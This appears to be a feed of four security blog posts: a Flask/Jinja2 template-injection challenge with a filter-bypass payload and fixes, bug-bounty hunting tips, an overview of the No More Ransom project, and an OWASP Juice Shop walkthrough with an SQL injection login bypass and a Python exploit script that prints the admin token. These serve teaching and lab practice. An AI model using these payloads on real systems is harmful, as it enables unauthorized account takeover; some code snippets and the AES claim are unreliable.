DEV Community: I Am A Hacker

Server-Side Template Injection Vulnerability?

I Am A Hacker — Fri, 26 Jan 2024 04:23:23 +0000

Hackers have a sneaky trick called "server-side template injection," and it can turn your secure haven into a data-breached disaster zone. But fear not, internet warriors! We're here to unveil this hidden threat and equip you with the tools to shut it down for good. No more sleepless nights worrying about stolen passwords or hijacked accounts. Let's build an impenetrable shield against server-side template injection, one line of code at a time!

Meet Integrity—an exciting online platform that serves as a global hub for crowdsourced security. This dynamic space not only facilitates bug bounty programs but also empowers bug bounty hunters to showcase their skills. I've been avidly tracking their Twitter account for quite some time now. Occasionally, they throw out intriguing challenges—be it a snippet of code or a puzzle—and invite people to take on the quest. It's a thrilling journey of problem-solving and community engagement!

Integrity just dropped another enigma on Twitter, and my detective senses are tingling! Let's unravel the latest challenge before the clock runs out.

so the challenge is basically about Server-Side Template Injection Vulnerability but in a very nice way so they posted Python code based on the Flask framework.

from flask import Flask, request
from jinja2 import Environment

app = Flask(__name__)
Jinja2 = Environment()

@app.route("/email-settings/opt-out")
def email_opt_out():
    user_email = request.values.get("user_email")
    user_email = user_email.sub( "(\{|\})", "", user_email, 2 )

    output = Jinja2.from_string(
        '<h1> Are you sure you want to opt out ' + user_email
        + ' from receiving any future promotional emails ? </h1>'
        + '<a href="/">cancel</a>'
        + '<button style="margin-left:1rem;" onClick="submit()"> Unsubscribe</button>'
    ).render()

    return output

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

when I tried and run the code there was a slight problem that was the code was missing re library and also instead of using user_email to sub-function you need to use re so the proper working code looks like below.

from flask import Flask, request, render_template_string
from jinja2 import Environment
import re

app = Flask(__name__)
Jinja2 = Environment()

@app.route("/email-settings/opt-out")
def email_opt_out():
    user_email = request.values.get("user_email")
    user_email = re.sub( "(\{|\})", "", user_email, 2 )

    output = Jinja2.from_string(
        '<h1> Are you sure you want to opt out ' + user_email
        + ' from receiving any future promotional emails ? </h1>'
        + '<a href="/">cancel</a>'
        + '<button style="margin-left:1rem;" onClick="submit()"> Unsubscribe</button>'
    ).render()

    return output

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

Now that the code works let's understand what was the solution implemented by the developer and where does it fails.

Once you start the server you can access the function by the following URL...

http://localhost:5000/email-settings/opt-out?user_email={{7*'7'}}

it would work fine for removing just two brackets but if you enter 3 the check will be bypassed.

http://localhost:5000/email-settings/opt-out?user_email={{{7*'7'}}}

Now if you are a bug bounty hunter and working with a client and you have come this far your job is done you can now report this to the company and they will approve but if you are a developer and you need to find a solution for this problem read more because a solution to the problem is coming...

In order to resolve the issue in the code you can use proper sanitization...

for instance, you can use the flask escape function

from flask import escape

# ...

user_email = escape(request.values.get("user_email"))

Or you can use jinja2 Markup function like below...

from jinja2 import Markup

# ...

output = Jinja2.from_string(
    Markup('<h1> Are you sure you want to opt out ' + user_email
    + ' from receiving any future promotional emails ? </h1>'
    + '<a href="/">cancel</a>'
    + '<button style="margin-left:1rem;" onClick="submit()"> Unsubscribe</button>')
).render()

hopefully, the blog is an interesting read if so do like share, and follow because some awesome content is coming...

How to Find Your First Bug: Motivation and Tips for Bug Bounty Hunting

I Am A Hacker — Sat, 18 Mar 2023 05:01:23 +0000

Bug bounty hunting can be a challenging and rewarding experience, but it can also be difficult to locate your first bug. If you're new to bug bounty hunting, don't worry – with persistence, dedication, and the right strategies, you can increase your chances of success. Here are some helpful tips to guide you on your bug bounty journey.

1. Research the Application:

Before testing for bugs, take some time to register on the app and explore its features. Play with the app like a regular user and ask yourself questions such as:

What will happen if a regular user can access this admin section?
Can a non-admin user view this secret doc?
Can a user upload non-basic doc types, such as PHP files in a PHP application?
Is it possible to inject HTML tags into exported PDFs, and if so, is it possible to read internal files using an tag ?
Is it possible to call localhost when creating a new webhook, or even an AWS metadata address?
Does the app require an old password for changing the password or email? If not, then is it possible to find XSS somewhere to achieve full ATO (Account Takeover)?
What kind of stack app is built with, what are the versions, and are there any vulnerabilities / CVEs with PoCs?
Are there any file paths in URL params or POST body that can be tested for LFI (local file inclusion) vulnerabilities?
Is there any premium subscription plan that gives benefits? Can these benefits be achieved using a normal user without a subscription?

Asking questions like these can help you identify potential vulnerabilities and give you a better understanding of the app's security.

2. Stay Focused:

During your testing sessions, try to stay focused and avoid distractions. It's also important to take breaks in between testing sessions to stay fresh and maintain your focus. For example, 2 hours on one day and 2 hours on another day are better than 4 hours on one day, since your brain needs time to analyze information.

3. Look for Low-Hanging Fruit:

Start with the basics, such as looking for broken links, SQL injection, or XSS vulnerabilities. These types of vulnerabilities are common and easy to find, so they can be a good way to get started.

4. Use Automated Tools:

While it's important to test the app manually, automated tools can help you cover more ground and identify potential vulnerabilities quickly. However, it's essential to note that automated tools are not a substitute for manual testing.

5. Focus on One Area:

Instead of trying to test the entire app at once, focus on one specific area or feature. This approach will help you develop a deeper understanding of that area, and you may find vulnerabilities that you wouldn't have discovered otherwise.

6. Learn from Others:

Join online communities, attend conferences, and read bug bounty write-ups from other researchers. This way, you can learn from their experiences, techniques, and insights.

6. Document Everything:

Make sure to document everything you do during your testing sessions, including screenshots, notes, and logs. This documentation will be useful when you submit your bug report, and it can also help you keep track of your progress and identify areas where you need to improve.

Remember, bug bounty hunting is a journey, not a destination. It takes time, patience, and dedication to develop the skills and knowledge necessary to be successful. By following these tips and continuing to learn and improve, you can increase your chances of locating your first bug and becoming a successful bug bounty hunter. Good luck!

No More Ransom

I Am A Hacker — Wed, 01 Feb 2023 06:08:56 +0000

Introduction to "No More Ransom"

"No More Ransom" is an innovative initiative launched by law enforcement agencies, cybersecurity companies, and other organizations to help victims of ransomware attacks retrieve their encrypted data without paying the ransom demanded by cybercriminals. The website offers a range of resources, including decryption tools, information on preventing ransomware attacks, and more.

The increasing prevalence of ransomware attacks has made it imperative for organizations and individuals to take proactive measures to protect against this threat. The "No More Ransom" website provides a comprehensive solution for those who have fallen victim to a ransomware attack, offering free tools and resources to help them regain access to their data.

The website is the result of a collaboration between the National High Tech Crime Unit of the Netherlands' police, Europol's European Cybercrime Centre, Kaspersky, and McAfee, among others. This collaboration underscores the commitment of these organizations to combating the growing threat of ransomware and protecting individuals and organizations from its devastating effects.

Key Features of "No More Ransom"

Offers 136 free decryption tools: "No More Ransom" provides victims with 136 free decryption tools to assist them in retrieving their encrypted data without paying the ransom. These tools are designed to work with specific strains of ransomware and can be used to restore access to a victim's files.

Utilizes AES encryption: The decryption tools offered by "No More Ransom" utilize the AES encryption algorithm, which is a widely used encryption standard. This ensures that the decryption process is secure and trustworthy.

Information on prevention and protection: In addition to providing decryption tools, "No More Ransom" also includes information on how to prevent ransomware attacks and protect against future ones. This information is designed to help victims understand the steps they can take to reduce the risk of falling victim to another attack in the future.

Completely free and accessible: "No More Ransom" is a completely free resource and is accessible to anyone affected by a ransomware attack. The website is designed to be user-friendly and easy to navigate, allowing victims to quickly find the information and tools they need to regain access to their encrypted files.

Understanding Ransomware Attacks

Ransomware is a type of malware that encrypts a user's data and demands a ransom payment in exchange for the decryption key.
Ransomware attacks can be devastating for individuals and organizations, often leading to the loss of important information.
Effective cybersecurity measures and regular backups are crucial in protecting against ransomware attacks.

Conclusion

"No More Ransom" offers a valuable solution for those who have fallen victim to a ransomware attack. With free decryption tools and information on preventing these types of attacks, the website provides an effective means of regaining control of encrypted data without paying the ransom demanded by cybercriminals. The collaboration between law enforcement, cybersecurity companies, and other organizations behind "No More Ransom" is a step towards combating the growing ransomware threat.

Logging with the administrator's user account OWASP Juice shop

I Am A Hacker — Sun, 18 Sep 2022 07:12:31 +0000

Hi, I am a hacker and its nice to have you on board in this blog we will look at Logging in with the administrator's user account it is a challenge from OWASP in the OWASP juice shop and just to add a little bit of background to this blog I am doing a series on CTF that is hacking into OWASP juice shop it just a walkthrough for beginner to learn how to approach certain CTF challenges and get started.

click here to view the complete series

let's get started…

first, let's take some notes or write down some points.. so that we can fall back on them later...
so,

-- our main goal here is to log in with the administrator

-- and we have a login page

let's look and see if it's vulnerable to SQL injections by typing a single court "'" in the username.

-- yes it is vulnerable to SQL injection
-- now lets us a payload that is ' or 1=1;-- in the username field and add anything in the password like.

Got em.

now let me explain what happened, suppose we have an SQL query.



select * from users where username = "entered username" and password = "entered password"

so we need true from both, the username condition as well the password condition so what we will do is we will write a single " ' " court that will stop the query there and with "or and 1=1" we make the condition true and by two dashes we ignore the rest of the query so we have a true condition in the login and hence we log in as administrator account...

Explanation

The application is vulnerable to SQL injection attacks. This means data entered by the user is integrated one-to-one in an SQL command. This can then be amended as appropriate like in our case we amended or you can say extended by adding a single court. Changing this type of SQL code can also provoke errors that provide specific details of the structure of the database or the command.

Now that we understand how everything works let's code a python program that exploits the vulnerability...

so I have opened up an empty python file and named it main.py you can name it anything now to start with our program we will first import all the libraries.

that is



import requests
import sys
import urllib3
import json

like so,

and then to get rid of funky errors, we will write



urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarnings)

what this line will do is, it will disable the insecure warning like when we set an HTTP or HTTPS request.

you can read about it by just googling but I guess for now it's enough to know that we are disabling the warnings with it...

anyway let's move forward and that is to define our proxies...



proxies = {'http': 'http:127.0.0.1:8000', 'https' : 'http://127.0.0.1:8000'}

this code is written for sending all our requests through burp and that is for when we mess up something in our code we will have all our history in burp and that way it would be easy for us to figure out what went wrong..

here I want to explain one thing and that is that I have sent both HTTP and HTTPS to HTTP that something is not working right for me like I change the HTTPS link to HTTPS it doesn't work like it doesn't send any request and when I change it to HTTP it works again if anyone has a solution for it let me know so that I can implement it...

let's move forward and we will write our main function...



def main():


if __name__ == "__main__":
    main()

inside the main function, we will first look if the number of arguments entered by the user is correct...



def main():
    try :
        url = sys.argv[1].strip()
    except IndexError:
        print("[-] Usage: %s <url> " % sys.argv[0])
        print("[-] Usage: %s www.example.com " % sys.argv[0])
        sys.exit(-1)

so try is for trying out the code url = sys.argv.strip() if this works the system will assign the argument 1 (that is the second aurgument for us like things start from 0 for computers) entered by the user to url and continue running but if its not entered the program will through an error like shown in the example...

any let move forward...

now if they entered the correct aurgments we want to try and login as an administrator...

let do that by..

now this code is part of main so i wont write that again



    if login_as_administrator(url):
        print("[+] Challange completed")
        sys.exit(0)

    print("[-] Sorry something went wrong")

now what i am doing is calling a function which is not yet created but we will create that in mint but we are calling it and check if it returned true or false if true we want to print that challenge was completed and if not we want to say that something went wrong...

just explain one more than the sys.exit code -1 is for error and 0 is saying everything is ok...

ok let create the login as administrator function...

the first thing i want to check is that if i go to owasp juice shop and look in the inspect network tab and also you can check in burp the request for login goes to /rest/user/login

like as shown in the image so and if we come over to the request tab you would see we are sending email and password.. like so..

any so our code would be



def login_as_administrator(url):

    uri = "/rest/user/login"
    data = {'email': "' or 1=1;--", 'password': 10001}

    return False

now let use the request library and send a request to owasp juice shop...



def login_as_administrator(url):

    uri = "/rest/user/login"
    data = {'email': "' or 1=1;--", 'password': 10001}
    r = requests.post( url + uri, data = data, verify = False, proxies = proxies )
    if "authentication" in r.text:
        return True
    return False

ok now the last thing we need to check is that if we logged in with administrator or not...

and if you are willing you can refine with by print some out like so and that's it..



if "authentication" in r.text:
        json_array = json.loads(r.text)
        print("[+] Loged In Successfull!")
        print("Email : %s" % json_array["authentication"]["umail"])
        print("Bid : %s" % json_array["authentication"]["bid"])
        print("Token : %s" % json_array["authentication"]["token"])
        return True

visit complete code on github click here.